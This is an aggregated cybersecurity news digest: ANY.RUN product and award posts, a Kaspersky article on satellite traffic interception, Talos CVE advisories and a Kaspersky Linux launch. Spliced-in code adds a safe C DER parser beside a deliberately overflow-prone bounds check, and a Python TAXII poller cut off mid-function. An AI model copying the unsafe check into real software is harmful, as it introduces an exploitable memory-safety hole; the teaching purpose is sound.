ANY.RUN Wins Trailblazing Threat Intelligence at the 2025 Top InfoSec Innovators Awards

Big news from the ANY.RUN team: we’ve just been named the 2025 “Trailblazing Threat Intelligence” winner at the Top InfoSec Innovators Awards!

This recognition means a lot to us because it celebrates what we care about most: helping analysts, SOC teams, and researchers access live, actionable threat intelligence that makes a real difference in investigations every day. 

A Milestone That Reflects Our Mission 

The Top InfoSec Innovator Awards celebrate cybersecurity companies that shape the future of the industry with new ideas and bold technology. Now in its 13th year, the program is known worldwide for spotlighting organizations that truly move the field forward. 

Winning the Trailblazing Threat Intelligence award reinforces what drives us: transforming how teams investigate and respond to cyber threats through a connected, behavioral approach to intelligence.

TI Lookup with 40+ parameters, used to discover relevant intel from real-world threat investigations  

For our users, this award reflects the impact they experience every day: 

  • Connected intelligence, powered by 15,000+ company data sources worldwide: ANY.RUN’s ecosystem gathers insights from thousands of live environments, helping teams detect threats that traditional feeds often miss. 
  • 24× more IOCs per incident for wider visibility: Live data from global attacks ensures comprehensive coverage of new malware and phishing campaigns, giving analysts the full picture behind each alert. 
  • 99% unique IOCs to cut noise and workload: In-depth behavioral intelligence filters out duplicates and low-value data, reducing Tier 1/Tier 2 investigation time and supporting faster, more confident decisions. 
  • 21 minutes faster MTTR per case: Real-time context for IOCs, IOAs, and IOBs provides the insight analysts need to prioritize critical alerts and accelerate incident resolution. 

Connecting People and Data Through Innovative Threat Intelligence 

We earned this recognition because innovation at ANY.RUN is built around real analyst needs. Instead of scattering data across multiple tools, we created an ecosystem where threat intelligence is connected, interactive, and human-centered. 

Our Threat Intelligence Lookup and Threat Intelligence Feeds bridge live malware behavior with verified indicators, giving teams instant context they can trust. Whether it’s uncovering hidden links between campaigns or enriching detections automatically, these solutions help analysts see more, decide faster, and collaborate better. 

TI Feeds gather fresh threat data and enrich your system with it for expanded threat coverage 

That’s what this award stands for: innovation that connects people and data to make threat intelligence more practical, powerful, and ready for what’s next. 

Looking Ahead: Building the Future of Threat Intelligence 

This recognition fuels our drive to keep innovating. 
In the coming months, we’re expanding our Threat Intelligence products with even deeper enrichment, new integrations for SIEM and SOAR platforms, and broader OS coverage. 

But most importantly, we’ll keep growing together with our community: the analysts, researchers, and security teams who make ANY.RUN what it is today. Every sample executed, every IOC shared, every insight contributed helps make global defense stronger.

So, this win is yours as much as it is ours. 🏆 

See Why the Industry Calls It Trailblazing 

Experience threat intelligence that helps analysts act 21 minutes faster per case and uncover 24× more IOCs per incident. 

With behavior-driven data and real-world context, ANY.RUN turns every investigation into clear, actionable insight. 

Book a live demo and see how connected intelligence can sharpen your team’s response. 

About ANY.RUN 

ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, makes advanced investigation fast, visual, and accessible. 
The service processes millions of analysis sessions and is trusted by 15,000+ organizations and over 500,000 cybersecurity professionals worldwide.

Teams using ANY.RUN report tangible gains: up to 3× higher SOC efficiency, 90% faster detection of unknown threats, and a 60% reduction in false positives thanks to real-time interactivity and behavior-based analysis.

Explore ANY.RUN’s capabilities with a 14-day trial 

The post ANY.RUN Wins Trailblazing Threat Intelligence at the 2025 Top InfoSec Innovators Awards appeared first on ANY.RUN’s Cybersecurity Blog.


Half of the world’s satellite traffic is unencrypted | Kaspersky official blog

The year is 2024. A team of scientists from both the University of California San Diego and the University of Maryland, College Park, discovers an unimaginable danger looming over the world — its source hiding in space. They start sounding the alarm, but most people simply ignore them…

No, this isn’t the plot of the Netflix hit movie Don’t Look Up. This is the sudden reality in which we find ourselves following the publication of a study confirming that corporate VoIP conversations, military operation data, Mexican police records, private text messages and calls from mobile subscribers in both the U.S. and Mexico, and dozens of other types of confidential data are being broadcast unencrypted via satellites for thousands of miles. And to intercept it, all you need is equipment costing less than US$800: a simple satellite-TV receiver kit.

Today, we explore what might have caused this negligence, if it’s truly as easy to extract the data from the stream as described in a Wired article, why some data operators ignored the study and took no action, and, finally, what we can do to ensure our own data doesn’t end up on these vulnerable channels.

What happened?

Six researchers set up a standard geostationary satellite-TV antenna — the kind you can buy from any satellite provider or electronics store — on the university roof in the coastal La Jolla area of San Diego, Southern California. The researchers’ no-frills rig set them back a total of US$750: $185 for the satellite dish and receiver, $140 for the mounting hardware, $195 for the motorized actuator to rotate the antenna, and $230 for a TBS5927 USB-enabled TV tuner. It’s worth noting that in many other parts of the world, this entire kit likely would have cost them much less.

What distinguished this kit from the typical satellite-TV antenna likely installed outside your own window or on your roof was the motorized dish actuator. This mechanism allowed them to reposition the antenna to receive signals from various satellites within their line of sight. Geostationary satellites, used for television and communications, orbit above the equator and move at the same angular velocity as the Earth. This ensures they remain stationary relative to the Earth’s surface. Normally, once you point your antenna at your chosen communication satellite, you don’t need to move it again. However, the motorized drive allowed the researchers to quickly redirect the antenna from one satellite to another.

Every geostationary satellite is equipped with numerous data transponders used by a variety of telecom operators. From their vantage point, the scientists managed to capture signals from 411 transponders across 39 geostationary satellites, successfully obtaining IP traffic from 14.3% of all Ku-band transponders worldwide.


The researchers were able to use their simple US$750 rig to examine traffic from nearly 15% of all active satellite transponders worldwide. Source

The team first developed a proprietary method for precise antenna self-alignment, which significantly improved signal quality. Between August 16 and August 23, 2024, they performed an initial scan of all 39 visible satellites. They recorded signals lasting three to ten minutes from every accessible transponder. After compiling this initial data set, the scientists continued with periodic selective satellite scans and lengthy, targeted recordings from specific satellites for deeper analysis — ultimately collecting a total of more than 3.7TB of raw data.

The researchers wrote code to parse data transfer protocols and reconstruct network packets from the raw captures of satellite transmissions. Month after month, they meticulously analyzed the intercepted traffic, growing increasingly concerned with each passing day. They found that half (!) of the confidential traffic broadcast from these satellites was completely unencrypted. Considering that there are thousands of transponders in geostationary orbit, and the signal from each one can, under favorable conditions, be received across an area covering up to 40% of the Earth’s surface, this story is genuinely alarming.


Pictured at the University of San Diego roof setup, from left to right: Annie Dai, Aaron Schulman, Keegan Ryan, Nadia Heninger, and Morty Zhang. Not pictured: Dave Levin. Source

What data was broadcast with open access?

The geostationary satellites were found to be broadcasting an immense and varied amount of highly sensitive data completely unencrypted. The intercepted traffic included:

  • Calls, SMS messages, and internet traffic from end-users; equipment identifiers and cellular encryption keys belonging to various operators, including T-Mobile and AT&T Mexico
  • Internet data for users of in-flight Wi-Fi systems installed on commercial passenger aircraft
  • Voice traffic from several major VoIP providers, including KPU Telecommunications, Telmex, and WiBo
  • Government, law enforcement and military traffic: data originating from U.S. military ships; real-time geolocation and telemetry data from Mexican Armed Forces air, sea and ground assets; and information from Mexican law enforcement agencies — including data on drug trafficking operations and public assemblies
  • Corporate data: internal traffic from major financial organizations and banks like Grupo Santander Mexico, Banjército, and Banorte
  • Internal traffic from Walmart-Mexico, including details on warehouse inventory and price updates
  • Messages from key U.S. and Mexican infrastructure facilities like oil and gas rigs and electricity providers

While most of this data seems to have been left unencrypted due to sheer negligence or a desire to cut costs (which we’ll discuss later), the presence of cellular data in the satellite network has a slightly more intriguing origin. This issue stems from what is known as backhaul traffic — used to connect remote cell towers. Many towers located in hard-to-reach areas communicate with the main cellular network via satellites: the tower beams a signal up to the satellite, and the satellite relays it back to the tower. Crucially, the unencrypted traffic the researchers intercepted was the data being transmitted from the satellite back down to the remote cell tower. This provided them access to things like SMS messages and portions of voice traffic flowing through that link.

Data operators’ response to the researchers’ messages

It’s time for our second reference to the modern classic by Adam McKay. The movie Don’t Look Up is a satirical commentary on our reality — where even an impending comet collision and total annihilation cannot convince people to take the situation seriously. Unfortunately, the reaction of critical infrastructure operators to the scientists’ warnings proved to be strikingly similar to the movie plot.

Starting in December 2024, the researchers began notifying the companies whose unencrypted traffic they’d successfully intercepted and identified. To gauge the effectiveness of these warnings, the team conducted a follow-up scan of the satellites in February 2025 and compared the results. They found that by no means all operators had taken action to fix the issues. Therefore, after waiting nearly a year, the scientists decided to publicly release their study in October 2025 — detailing both the interception procedure and the operators’ disappointing response.

The researchers stated that they were only publishing information about the affected systems after the problem had been fixed or after the standard 90-day waiting period for disclosure had expired. For some systems, an information disclosure embargo was still in effect at the time of the study’s publication, so the scientists plan to update their materials as clearance allows.

Among those who failed to address the notifications were: the operators of unnamed critical infrastructure facilities, the U.S. Armed Forces, Mexican military and law enforcement agencies, as well as Banorte, Telmex, and Banjército.

When questioned by Wired about the incident, in-flight Wi-Fi providers responded vaguely. A spokesperson for Panasonic Avionics Corporation said the company welcomed the findings by the researchers, but claimed they’d found that several statements attributed to them were either inaccurate or misrepresented the company’s position. The spokesperson didn’t specify what exactly it was that the company considered inaccurate. “Our satellite communications systems are designed so that every user-data session follows established security protocols,” the spokesperson said. Meanwhile, a spokesperson for SES (the parent company of Intelsat) completely shifted responsibility onto the users, saying, “Generally, our users choose the encryption that they apply to their communications to suit their specific application or need,” effectively equating using in-flight Wi-Fi with connecting to a public hotspot in a café or hotel.


The SES spokesperson’s response to Wired, along with a comment by Matthew Green, an associate professor of computer science at Johns Hopkins University in Baltimore. Source

Fortunately, there were also many appropriate responses, primarily within the telecommunications sector. T-Mobile encrypted its traffic within just a few weeks of being notified by the researchers. AT&T Mexico also reacted immediately, fixing the vulnerability and stating it was caused by a misconfiguration of some towers by a satellite provider in Mexico. Walmart-Mexico, Grupo Santander Mexico, and KPU Telecommunications all approached the security issue diligently and conscientiously.

Why was the data unencrypted?

According to the researchers, data operators have a variety of reasons — ranging from technical to financial — for avoiding encryption.

  • Utilizing encryption can lead to a 20–30% loss in transponder bandwidth capacity.
  • Encryption requires increased power consumption, which is critical for remote terminals, such as those running on solar batteries.
  • For certain types of traffic, such as VoIP for emergency services, the lack of encryption is a deliberate measure taken to increase fault tolerance and reliability in critical situations.
  • Network providers claimed that enabling encryption made it impossible to troubleshoot certain existing network problems within their current infrastructure. The providers did not elaborate on the specifics of that claim.
  • Enabling link-layer encryption may require additional licensing fees for using cryptography in terminals and hubs.

Why did some vendors and agencies fail to react?

It’s highly likely they simply did not know how to respond. It’s difficult to believe that such a massive vulnerability could remain unnoticed for decades, so it’s possible the problem was intentionally left unaddressed. The researchers note that no single, unified entity is responsible for overseeing data encryption on geostationary satellites. Each time they discovered confidential information in their intercepted data, they had to expend considerable effort to identify the responsible party, establish contact, and disclose the vulnerability.

Some experts are comparing the media impact of this research to the declassified Snowden archives, given that the interception techniques used could be deployed for worldwide traffic monitoring. We can also liken this case to the infamous Jeep hack, which completely upended cybersecurity standards in the automotive industry.

We cannot exclude the possibility that this entire issue stems from simple negligence and wishful thinking — a reliance on the assumption that no one would ever “look up”. Data operators may have treated satellite communication as a trusted, internal network link where encryption was simply not a mandatory standard.

What can we as users do?

For regular users, the recommendations are similar to those we give for using any unsecured public Wi-Fi access point. Unfortunately, while we can encrypt the internet traffic originating from our devices ourselves, the same cannot be done for cellular voice data and SMS messages.

  • For any confidential online operations, enable a reliable VPN that includes a kill switch. This ensures that if the VPN connection drops, all your traffic is immediately blocked rather than being routed unencrypted. Use your VPN when making VoIP calls, and especially when using in-flight Wi-Fi or other public access points. If you lean toward the paranoid side, leave your VPN on at all times. An effective and fast solution for your needs could be Kaspersky VPN Secure Connection.
  • Utilize 5G networks whenever possible, as they feature higher encryption standards. However, even these can be insecure, so avoid discussing sensitive information via text or standard cellular voice calls.
  • Use messaging apps that provide end-to-end encryption for traffic on user devices, such as Signal, WhatsApp, or Threema.
  • If you’re using a cellular service in remote locations, minimize SMS chats and voice calls, or use services from operators that integrate encryption at the subscriber equipment level.


Source: Kaspersky official blog

How social engineering works | Unlocked 403 cybersecurity podcast (S2E6)

Think you could never fall for an online scam? Think again. Here’s how scammers could exploit psychology to deceive you – and what you can do to stay one step ahead

Source: WeLiveSecurity

Unified Security for Fast Response: All ANY.RUN Integrations for SIEM, SOAR, EDR, and More 

ANY.RUN’s malware analysis and threat intelligence products are used by 15K SOCs and 500K analysts. Thanks to a flexible API/SDK and ready-made connectors, they seamlessly integrate with security teams’ existing software to expand threat coverage, reduce MTTR, and streamline performance.

Here’s how ANY.RUN’s solutions can transform your security. 

Interactive Sandbox: Detect Evasive Phishing & Malware 

Interactive Sandbox provides SOCs with fast threat detection capabilities  

ANY.RUN’s Interactive Sandbox provides a real-time, cloud-based environment for detonating and analyzing suspicious files, URLs, and scripts across Windows, Linux, and Android systems. It lets analysts perform user actions like launching executables or opening links needed to trigger kill chains and force hidden payloads to reveal themselves, enabling faster detection and response.  

The sandbox integrates with other solutions like SOAR platforms in an automated mode, which means it can fully detonate complex phishing and malware attacks on its own, including by solving CAPTCHAs and scanning QR codes. 

The sandbox delivers immediate, actionable insights into the most evasive threats without risking production systems. 

  • Real-Time Threat Visibility: Observe attack chains as they unfold, with 90% of threats detected within 60 seconds, accelerating mean time to detect (MTTD). 
  • Higher Detection Rates: Uncover low-detection attacks (e.g., multi-stage malware, CAPTCHA-protected phishing) with up to 58% more threats identified, reducing missed incidents. 
  • Automated Efficiency: Cut manual analysis time with automated interactivity, reducing Tier 1 workload by 20% and enabling junior analysts to handle complex cases independently. 

Connectors and integrations for Interactive Sandbox 

If your solution is not on the list, you can easily set up a custom integration using ANY.RUN’s API or Python-based SDK (see docs on GitHub or PyPi). 

Threat Intelligence Feeds: Expand Threat Coverage 

TI Feeds offer 99% unique IOCs to identify the latest threats early 

Threat Intelligence Feeds deliver real-time, high-confidence malicious indicators (IPs, domains, URLs) supplied in STIX/TAXII. The indicators are sourced from analyses of the latest malware and phishing attacks performed by 15,000 organizations and 500,000 analysts in ANY.RUN’s Interactive Sandbox.  

Thanks to being powered by one of the largest malware analysis communities, these feeds provide 99% unique IOCs, not found in other sources, that are updated in real time. 

As a result, they give SOCs up-to-date visibility into threats almost as soon as they emerge. With TI Feeds, security teams can: 

  • Catch new attacks early: Live intel is streamed soon after the sandbox detection. 
  • Respond faster: IOCs come with sandbox reports with full context.  
  • Reduce workload: Filtering ensures only high-risk indicators are added. 

Connectors and integrations for TI Feeds 

If your solution is not on the list, you can easily set up a custom integration using ANY.RUN’s API or Python-based SDK (see docs on GitHub or PyPi). 

Threat Intelligence Lookup: Contextualize Alerts 

TI Lookup lets SOC teams get instant context for 40 types of indicators 

Threat Intelligence Lookup is a powerful solution designed to streamline and accelerate malware investigations, from proactive monitoring to incident response.  

SOC teams can use it to quickly get actionable context for over 40 different types of Indicators of Compromise (IOCs), Attack (IOAs), and Behavior (IOBs), from an IP address and a domain to a mutex and a process name.  

TI Lookup provides fresh indicators for the most active malware families 

Each indicator in TI Lookup’s database is linked to the sandbox session where it was observed, providing analysts with a complete view of the attack, including its TTPs.

  • Triage alerts faster: Two-second access to millions of past analyses confirms if an IOC belongs to a threat, cutting triage time. 
  • Shorten response time: Indicator enrichment with behavioral context and TTPs guides precise containment strategies.
  • Reduce unnecessary escalations: Provides Tier 1 analysts with the info to make decisions independently, reducing escalations to Tier 2. 

Connectors and integrations for TI Lookup 

If your solution is not on the list, you can easily set up a custom integration using ANY.RUN’s API or Python-based SDK (see docs on GitHub or PyPi). 

Integrate ANY.RUN’s Solutions in Your SOC 

Whether you want to uncover hidden threats in seconds, catch emerging attacks, or enrich alerts with actionable context, ANY.RUN equips your SOC with the visibility, speed, and efficiency needed to stay ahead.  

With flexible API/SDK and ready-made connectors for leading platforms, implementation is smooth, and the impact is immediate: faster MTTR, higher detection rates, and a stronger defense posture. 

Feel free to reach out to us about integrating ANY.RUN’s products in your SOC at support@any.run.  

About ANY.RUN 

Trusted by over 500,000 cybersecurity professionals and 15,000+ organizations in finance, healthcare, manufacturing, and other critical industries, ANY.RUN helps security teams investigate threats faster and with greater accuracy.    

Our Interactive Sandbox accelerates incident response by allowing you to analyze suspicious files in real time, watch behavior as it unfolds, and make confident, well-informed decisions.    

Our Threat Intelligence Lookup and Threat Intelligence Feeds strengthen detection by providing the context your team needs to anticipate and stop today’s most advanced attacks.    

Ready to see the difference?   

Start your 14-day trial of ANY.RUN today →        

The post Unified Security for Fast Response: All ANY.RUN Integrations for SIEM, SOAR, EDR, and More  appeared first on ANY.RUN’s Cybersecurity Blog.


TruffleHog, Fade In and BSAFE Crypto-C vulnerabilities


Cisco Talos’ Vulnerability Discovery & Research team recently disclosed three vulnerabilities in Dell BSAFE, two in Fade In screenwriting software, and one in TruffleHog.

The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy.    

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.     

Fade In out-of-bounds write vulnerabilities

Discovered by Piotr Bania of Cisco Talos.

Fade In is a cross-platform text handling software for screenwriters.

TALOS-2025-2250 (CVE-2025-53855) is an out-of-bounds write vulnerability in the XML parser functionality of GCC Productions Inc. Fade In 4.2.0. A specially crafted .fadein file can lead to an out-of-bounds write.

TALOS-2025-2252 (CVE-2025-53814) is a use-after-free vulnerability in the XML parser functionality of GCC Productions Inc. Fade In 4.2.0. A specially crafted .xml file can lead to heap-based memory corruption. 

TruffleHog arbitrary code execution vulnerability

Discovered by Adam Reiser of Cisco ASIG.

TruffleHog is a detection system for code repositories and ticket systems that finds exposed sensitive information, such as API keys and passwords. This vulnerability is described in an accompanying article on the Truffle Security website. The vulnerability is an arbitrary code execution vulnerability in the Git functionality of TruffleHog 3.90.2, TALOS-2025-2243 (CVE-2025-41390). A specially crafted repository can lead to arbitrary code execution. An attacker can provide a malicious repository to trigger this vulnerability.

Dell BSAFE integer overflow, underflow, and stack overflow vulnerabilities

Discovered by Jason Crowder.

Dell BSAFE Crypto-C is a FIPS 140-validated cryptography development kit for C/C++ environments. In cooperation with Jason Crowder, Talos published three vulnerabilities in the Dell BSAFE Crypto-C module. This product is at end of service; the vulnerable versions were added to an existing CVE.

TALOS-2025-2140 (CVE-2019-3728) is an integer overflow vulnerability, and TALOS-2025-2141 (CVE-2019-3728) is an integer underflow vulnerability. In both cases, a specially crafted ASN.1 record can lead to an out-of-bounds read. An attacker can provide a malformed ASN.1 record to trigger these vulnerabilities.

TALOS-2025-2142 (CVE-2019-3728) is a stack overflow vulnerability. A specially crafted ASN.1 record can lead to denial of service.
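The three BSAFE advisories above name the bug class (integer overflow and underflow in ASN.1 parsing leading to an out-of-bounds read) without showing it. The following added example, written for this digest and not BSAFE's or Talos's code, assumes a minimal DER tag-length-value header reader: `naive_fits` is the overflow-prone bounds test such parsers get wrong, and `der_read_tlv` is the same check written so that no length arithmetic can wrap or underflow. The sample records are constructed for illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Parsed DER tag-length-value record. */
typedef struct {
    uint8_t        tag;       /* identifier octet */
    size_t         len;       /* declared content length */
    const uint8_t *val;       /* points into the caller's buffer */
    size_t         consumed;  /* header + content bytes */
} der_tlv;

/* The unsafe bounds test: when len comes straight from the record,
 * start + len can wrap past SIZE_MAX and the check passes anyway. */
bool naive_fits(size_t start, size_t len, size_t total)
{
    return start + len <= total;              /* wraps when start + len > SIZE_MAX */
}

/* Defensive DER length decoder. Every bound is checked by subtracting from the
 * bytes that remain, so nothing can overflow or underflow: pos never exceeds
 * buflen (so buflen - pos is safe), oversized lengths are rejected without ever
 * computing pos + len, and length fields wider than size_t are refused. */
bool der_read_tlv(const uint8_t *buf, size_t buflen, der_tlv *out)
{
    if (buf == NULL || out == NULL || buflen < 2)
        return false;                         /* need at least tag + length */

    size_t  pos   = 0;
    uint8_t tag   = buf[pos++];
    uint8_t first = buf[pos++];
    size_t  len;

    if (first < 0x80) {
        len = first;                          /* short form */
    } else if (first == 0x80) {
        return false;                         /* indefinite length is BER, not DER */
    } else {
        size_t nbytes = first & 0x7F;         /* number of length octets */
        if (nbytes > sizeof(size_t))
            return false;                     /* not representable: reject, never truncate */
        if (nbytes > buflen - pos)
            return false;                     /* the length field itself is truncated */
        len = 0;
        for (size_t i = 0; i < nbytes; i++)
            len = (len << 8) | buf[pos++];
        if (len < 0x80 || buf[pos - nbytes] == 0)
            return false;                     /* DER requires minimal encoding */
    }

    if (len > buflen - pos)                   /* overflow-safe bounds check */
        return false;

    out->tag      = tag;
    out->len      = len;
    out->val      = buf + pos;
    out->consumed = pos + len;                /* safe: len <= buflen - pos */
    return true;
}

/* Constructed sample records (not from the advisory); each returns 1 on the expected outcome. */
int demo_short_form_ok(void)
{
    static const uint8_t rec[] = { 0x02, 0x01, 0x05 };          /* INTEGER 5 */
    der_tlv t;
    return der_read_tlv(rec, sizeof rec, &t)
        && t.tag == 0x02 && t.len == 1 && t.val[0] == 0x05 && t.consumed == 3;
}

int demo_long_form_ok(void)
{
    uint8_t rec[4 + 256];                                        /* OCTET STRING, 256 bytes */
    rec[0] = 0x04; rec[1] = 0x82; rec[2] = 0x01; rec[3] = 0x00;  /* long-form length 0x0100 */
    memset(rec + 4, 0xAA, 256);
    der_tlv t;
    return der_read_tlv(rec, sizeof rec, &t) && t.len == 256 && t.consumed == sizeof rec;
}

int demo_huge_length_rejected(void)
{
    /* eight 0xFF length octets: len would be SIZE_MAX on a 64-bit build */
    static const uint8_t rec[] = { 0x04, 0x88, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF };
    der_tlv t;
    return !der_read_tlv(rec, sizeof rec, &t);
}

int demo_truncated_length_rejected(void)
{
    static const uint8_t rec[] = { 0x04, 0x83, 0x01 };          /* claims 3 length octets, has 1 */
    der_tlv t;
    return !der_read_tlv(rec, sizeof rec, &t);
}

/* With a wrapped length the naive check still reports "fits"; that is the bug. */
int demo_naive_check_wraps(void)
{
    return naive_fits(10, SIZE_MAX, 10) == true;                 /* 10 + SIZE_MAX wraps to 9 */
}
```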

Source: Cisco Talos Blog

Ground zero: 5 things to do after discovering a cyberattack

When every minute counts, preparation and precision can mean the difference between disruption and disaster

Source: WeLiveSecurity

Kaspersky for Linux expands security options for home users | Kaspersky official blog

Great news for all Linux users: our product line for home users now includes Kaspersky for Linux. Our cybersecurity solution with the highest number of global accolades now delivers maximum protection for home users across all their devices running Windows, Linux, macOS, Android, and iOS — all with just one Kaspersky for Linux subscription.

If you thought Linux was immune to cyberthreats, it’s time to rethink that view. The number of malicious programs targeting this OS has increased 20-fold over the past five years! These threats include miners, ransomware, and even malware embedded into the source code of popular applications. For instance, last year’s attack involving a backdoor in the XZ archiving utility, which is built into many popular Linux distributions, could have become the most widespread attack on the Linux ecosystem in its entire history.

Beyond viruses, Linux users face other threats that are common across all platforms: phishing and malicious websites, as well as theft of passwords and banking and personal data.

As interest in Linux-powered devices grows year after year, we want to ensure our users have 100% protection across every operating system. To achieve this, we’ve adapted our business security solution, which has been used worldwide for years, to meet the needs of home users.

What can Kaspersky for Linux do?

The key features of Kaspersky for Linux include:

  • Monitoring the system, devices, and individual files to detect and eliminate malware
  • Scanning removable media connected to the PC, including USB drives and hard drives, for threats
  • Detecting malware through behavior analysis on the device, providing proactive defense
  • Protecting against malware on the internet
  • Alerting users when they attempt to follow a phishing link

AI-powered antivirus scans and blocks infected files, folders, and applications upon detecting viruses, ransomware Trojans, password stealers, and other malware, preventing infection of your PC, other devices, and your entire network.

Anti-phishing warns you about phishing links in emails and on websites to protect your login credentials and banking data from theft.

Online payment protection verifies the security of bank websites and online stores before you execute any financial transactions.

Anti-cryptojacking prevents unauthorized crypto mining on your device to ensure cybercriminals can’t drain its performance.

Scanning of removable media, such as USB drives and external hard drives, upon connection to your computer uses the tried-and-true method of defending against the spread of viruses.

What are the technical requirements for Kaspersky for Linux?

Kaspersky for Linux supports major 64-bit Linux distributions, including Ubuntu, ALT Linux, Uncom, and RED OS.

To install the software, your PC must meet the following minimum specifications: at least a Core 2 Duo 1.86GHz CPU, 2GB of RAM, at least 1GB of swap space, and 4GB of free disk space. You can find the full system requirements here.

How to install Kaspersky for Linux?

First, sign in to your My Kaspersky account. If you don’t have one, it’ll be created automatically when you purchase a subscription or install the free trial version.

Next, download the installation files compatible with your flavor of Linux: Kaspersky for Linux is distributed in DEB and RPM package formats.

Before you run the installer, double-check all requirements regarding your computer’s configuration, OS settings, and any installed software.

Follow the detailed step-by-step guide to install and set up the application. If you have any questions during setup or while using the application, you can consult the extensive Kaspersky for Linux help documentation.

Which Kaspersky subscription should Linux users choose?

Currently, the set of features available to users of Kaspersky for Linux doesn’t depend on your subscription — be it Kaspersky Standard, Kaspersky Plus, or Kaspersky Premium. This allows you to choose the most cost-effective option: for example, if you only need to protect a single PC running Linux, Kaspersky Standard is sufficient.

However, if you have a multi-device home ecosystem with computers, laptops, smartphones, and tablets running various operating systems, consider Kaspersky Premium. With this plan, you can protect up to 10 devices for all your family members. In addition to the top-tier security for Windows, Linux, macOS, Android, and iOS, you get a password manager, a fast and unlimited VPN, and a Kaspersky Safe Kids app for child protection and parental control (the last three are for Windows, macOS, Android, and iOS only).

You can explore everything Kaspersky for Linux can do with a free 30-day trial.

NB: Kaspersky for Linux isn’t GDPR-ready just yet.

Kaspersky official blog – ​Read More

Release Notes: ANY.RUN & ThreatQ Integration, 3,000+ New Rules, and Expanded Detection Coverage 

October brought another strong round of updates to ANY.RUN, from a new ThreatQ integration that connects our real-time Threat Intelligence Feeds directly into one of the industry’s leading TIPs, to hundreds of new signatures and rules that sharpen network and behavioral detection. 

With 125 new behavior signatures, 17 YARA rules, and 3,264 Suricata rules, analysts can now spot emerging threats faster and with greater precision. Together with the ThreatQ connector, these improvements make it easier for SOCs and MSSPs to enrich alerts, automate response, and gain deeper visibility into live attack activity. 

Product Updates 

Expanding Threat Intelligence Reach: ANY.RUN & ThreatQ 

October brought another major milestone to ANY.RUN’s growing ecosystem; a new integration that links ANY.RUN’s Threat Intelligence Feeds directly with ThreatQ, one of the industry’s leading Threat Intelligence Platforms (TIPs). 

This integration helps SOC teams and MSSPs gain real-time visibility into active global threats, cut investigation time, and strengthen detection accuracy across phishing, malware, and network attack surfaces. 

Now, analysts using ThreatQ can automatically ingest fresh, high-confidence IOCs gathered from live sandbox investigations of malware samples detonated by 15,000+ organizations and 500,000+ analysts worldwide. 

How this update helps security teams: 

TI Feeds help SOCs boost key security metrics 
  • Early detection: Indicators are streamed into ThreatQ the moment they appear in ANY.RUN sandbox sessions, helping teams spot threats before they hit endpoints or networks. 
  • Expanded coverage: Up to 99% unique IOCs from recent phishing and malware attacks provide visibility beyond traditional feeds. 
  • Faster, smarter response: Each IOC includes a link to its sandbox analysis, giving full behavioral context for rapid validation and containment. 
  • Lower analyst workload: Feeds are filtered to include only verified malicious indicators, cutting false positives and Tier-1 triage time. 

Simple Setup, Instant Impact 

The connector works through the STIX/TAXII protocol, ensuring full compatibility with existing ThreatQ environments. Security teams can configure feeds to update hourly, daily, or on a custom schedule; no custom development or infrastructure changes required. 

Add New TAXII Feed to your integrations 

For detailed information, see ANY.RUN’s TAXII connection documentation. 
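To show what the STIX/TAXII side of such a connector actually does, here is an added example written for this page; it is not ANY.RUN’s or ThreatQ’s connector code. It polls a TAXII 2.1 collection with an `added_after` cursor, walks paginated envelopes, keeps only indicators labelled `malicious-activity`, flattens their STIX patterns into lookup-ready IOCs, and carries each indicator’s external-reference URL along as the link back to the analysis. The API root, collection id, feed contents and the `fake_fetch` transport are constructed placeholders; `http_fetch` is the real transport you would swap in.

```python
"""Poll a TAXII 2.1 collection and flatten STIX indicators into IOCs.
Added example, not ANY.RUN's or ThreatQ's connector. API root, collection
id and feed contents are constructed placeholders; stdlib only, runs offline."""
import json
import re
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import urlencode
from urllib.request import Request, urlopen

TAXII_ACCEPT = "application/taxii+json;version=2.1"

# One STIX comparison: object:property = 'value' (the property may be quoted,
# e.g. file:hashes.'SHA-256'). AND/OR structure is flattened on purpose:
# every literal inside a malicious indicator is worth a lookup.
COMPARISON_RE = re.compile(r"([\w-]+):([\w.'-]+)\s*=\s*'([^']*)'")

# (STIX object type, property path) -> flat IOC type for SIEM lookups
IOC_TYPES = {
    ("domain-name", "value"): "domain", ("url", "value"): "url",
    ("ipv4-addr", "value"): "ipv4", ("email-addr", "value"): "email",
    ("file", "hashes.SHA-256"): "sha256", ("file", "hashes.MD5"): "md5",
}


def parse_pattern(pattern: str) -> List[Dict[str, str]]:
    """Return the (type, value) literals found in a STIX indicator pattern."""
    found = []
    for obj_type, prop, value in COMPARISON_RE.findall(pattern):
        ioc_type = IOC_TYPES.get((obj_type, prop.replace("'", "")))
        if ioc_type:
            found.append({"type": ioc_type, "value": value})
    return found


def iocs_from_envelope(envelope: dict) -> List[dict]:
    """Keep live indicators labelled malicious-activity; skip other SDOs,
    revoked objects and benign/unknown labels. First reference URL = analysis."""
    out = []
    for obj in envelope.get("objects", []):
        if obj.get("type") != "indicator" or obj.get("revoked"):
            continue
        if "malicious-activity" not in obj.get("indicator_types", []):
            continue
        refs = obj.get("external_references", [])
        analysis = next((r["url"] for r in refs if r.get("url")), None)
        for ioc in parse_pattern(obj.get("pattern", "")):
            out.append({**ioc, "indicator_id": obj["id"], "valid_from": obj.get("valid_from"),
                        "confidence": obj.get("confidence"), "analysis": analysis})
    return out


def http_fetch(url: str, headers: Dict[str, str]) -> Tuple[Dict[str, str], dict]:
    """Real transport: GET url, return (lower-cased response headers, JSON body)."""
    with urlopen(Request(url, headers=headers), timeout=30) as resp:
        return {k.lower(): v for k, v in resp.headers.items()}, json.load(resp)


def poll_collection(api_root: str, collection_id: str, added_after: Optional[str],
                    fetch: Callable = http_fetch) -> Tuple[List[dict], Optional[str]]:
    """Fetch every page added since `added_after`; return IOCs and the cursor
    (X-TAXII-Date-Added-Last) to persist for the next scheduled run."""
    params = {"match[type]": "indicator", "limit": "500"}
    if added_after:
        params["added_after"] = added_after
    cursor, iocs, next_page = added_after, [], None
    while True:
        query = dict(params, next=next_page) if next_page else params
        url = f"{api_root.rstrip('/')}/collections/{collection_id}/objects/?{urlencode(query)}"
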